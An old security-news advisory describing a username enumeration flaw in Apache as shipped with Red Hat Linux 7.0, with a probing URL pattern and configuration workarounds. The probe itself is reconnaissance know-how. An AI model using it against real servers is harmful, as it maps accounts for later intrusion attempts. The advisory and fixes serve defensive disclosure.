Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » Red Hat Linux Apache Remote Username Enumeration

Red Hat Linux Apache Remote Username Enumeration

by Phiber on September 19th, 2001 Versions of Apache webserver shipping with Red Hat Linux 7.0 (and possibly other Apache distributions) install with a default misconfiguration which could allow remote users to determine whether a give username exists on the vulnerable system.


This is easily shown by entering this into your web browser:

http://www.example.com/~


When a remote user makes a request for a possible user's default home page, the server returns one of three responses:


In a case where is a valid user account, and has been configured with a homepage, the server responds with the user's homepage.


When exists on the system, but has not been assigned a homepage document, the server returns the message "You don't have permission to access /~username on this server."


However, if the tested username does not exist as an account on the system, the Apache server's response includes the message "The requested URL /~username was not found on this server."


Because the server responds differently in the latter two cases, a remote user can test and enumerate possible usernames. Properly exploited, this information could be used in further attacks on the vulnerable host.


Solution:

  • Workaround 1:

    Disable the default-enabled UserDir directive:


    % echo 'UserDir Disabled' >> /var/www/conf/httpd.conf


  • Workaround 2:

    Substitute URL for pathname in httpd.conf:


    % echo 'ErrorDocument 404 http://localhost/sample.html'
    >> /var/www/conf/httpd.conf

    % echo 'ErrorDocument 403 http://localhost/sample.html' >> /var/www/conf/httpd.conf

    % sudo apachectl restart


  • Newsletter signup

    Signup to our monthly newsletter and stay in touch with IT news!

    Free E-books

    We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

    Contact

    Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

    Contact us »